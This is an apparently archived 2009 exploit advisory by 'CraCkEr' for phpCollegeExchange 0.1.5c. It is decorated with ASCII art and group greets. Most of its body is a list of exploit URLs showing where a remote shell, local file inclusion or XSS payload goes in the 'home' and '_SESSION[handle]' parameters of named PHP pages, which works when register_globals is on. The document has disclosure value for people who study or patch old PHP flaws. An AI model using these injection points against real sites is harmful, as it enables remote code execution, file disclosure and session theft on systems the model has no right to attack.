phpCollegeExchange 0.1.5c (RFI/LFI/XSS) Multiple Vulnerabilities

2009-06-24T00:00:00
ID SSV:11695
Type seebug
Reporter Root
Modified 2009-06-24T00:00:00

Description

No description provided by source.

                                        
                                            
                                                ┌┌─────────────────────────────────────────────────────────────────────────────────┐
││                                C r a C k E r                                   ┌┘
┌┘             T H E   C R A C K   O F   E T E R N A L   M I G H T                ││
└─────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────         From The Ashes and Dust Rises An Unimaginable crack....         ────┐
┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘         [ Remote File Include ]     [ Local File Include ]     [ XSS ]         ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
:   Author   : CraCkEr                   : :                                       :
│   Script   : phpCollegeExchange 0.1.5c │ │          Register Globals :           │
│   Download : sourceforge.net           │ │                                       │
│   Method   : GET                       │ │           [█] ON   [ ] OFF            │
│   Critical : High [░░▒▒▓▓██]           │ │                                       │
│   Impact   : system information        │ │                                       │
│ ───────────────────────────────────────┘ └────────────────────────────────────── │
│                                 DALnet #crackers                                ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                  :
│  Release Notes:                                                                  │
│  ═════════════                                                                   │
│  Typically used for remotely exploitable vulnerabilities that can lead to        │
│  system compromise.                                                              │
│                                                                                  │

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘                                Exploit URL's                                   ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘

[RFI]

http://localhost/path/i_head.php?home=[SHELL]
http://localhost/path/i_nav.php?home=[SHELL]
http://localhost/path/user_new_2.php?home=[SHELL]
http://localhost/path/books/allbooks.php?home=[SHELL]
http://localhost/path/books/home.php?home=[SHELL]
http://localhost/path/books/mybooks.php?home=[SHELL]


[LFI]

http://localhost/path/house/myrents.php?home=[LFI]


[XSS]

http://localhost/php pages/home.php?_SESSION[handle]=[XSS]
http://localhost/path/i_head.php?home=[XSS]
http://localhost/path/i_nav.php?home=[XSS]
http://localhost/path/books/allbooks.php?home=[XSS]
http://localhost/path/books/allbooks.php?_SESSION[handle]=[XSS]
http://localhost/path/books/home.php?home=[XSS]
http://localhost/path/books/home.php?_SESSION[handle]=[XSS]
http://localhost/path/books/i_nav.php?home=[XSS]


   
└──────────────────────────────────────────────────────────────────────────────────┘
 
Greets:
       The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL, rd0 .

┌┌─────────────────────────────────────────────────────────────────────────────────┐
┌┘                                 © CraCkEr 2009                                 ┌┘
└─────────────────────────────────────────────────────────────────────────────────┘┘